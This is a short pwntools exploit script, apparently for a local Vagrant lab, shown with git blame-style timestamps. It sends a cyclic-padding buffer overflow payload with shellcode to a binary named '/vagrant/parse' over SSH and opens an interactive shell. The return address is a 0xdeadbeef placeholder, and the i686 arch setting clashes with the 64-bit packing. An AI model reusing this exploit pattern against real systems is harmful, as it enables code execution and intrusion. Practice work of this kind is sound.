2020-08-07 17:18:33 +00:00
|
|
|
from pwn import *
|
2020-08-07 17:22:42 +00:00
|
|
|
import base64
|
2020-08-07 17:18:33 +00:00
|
|
|
|
2020-08-07 17:22:42 +00:00
|
|
|
context.update(arch='i686', os='linux')
|
|
|
|
|
|
|
|
# Connect to the server with SSH
|
|
|
|
ssh_connection = ssh('vagrant', 'default', port=2222)
|
|
|
|
|
|
|
|
# Open a shell to write more stuff to
|
|
|
|
bash = ssh_connection.run('bash')
|
2020-08-07 17:18:33 +00:00
|
|
|
|
|
|
|
shellcode = shellcraft.sh()
|
|
|
|
print(shellcode)
|
|
|
|
print(hexdump(asm(shellcode)))
|
|
|
|
|
|
|
|
payload = cyclic(cyclic_find(0x0000555555555751))
|
|
|
|
payload += p64(0xdeadbeef)
|
|
|
|
payload += asm(shellcode)
|
|
|
|
|
2020-08-07 17:22:42 +00:00
|
|
|
bash.sendline('/vagrant/parse')
|
|
|
|
bash.sendline(payload)
|
|
|
|
bash.interactive()
|
2020-08-07 17:18:33 +00:00
|
|
|
|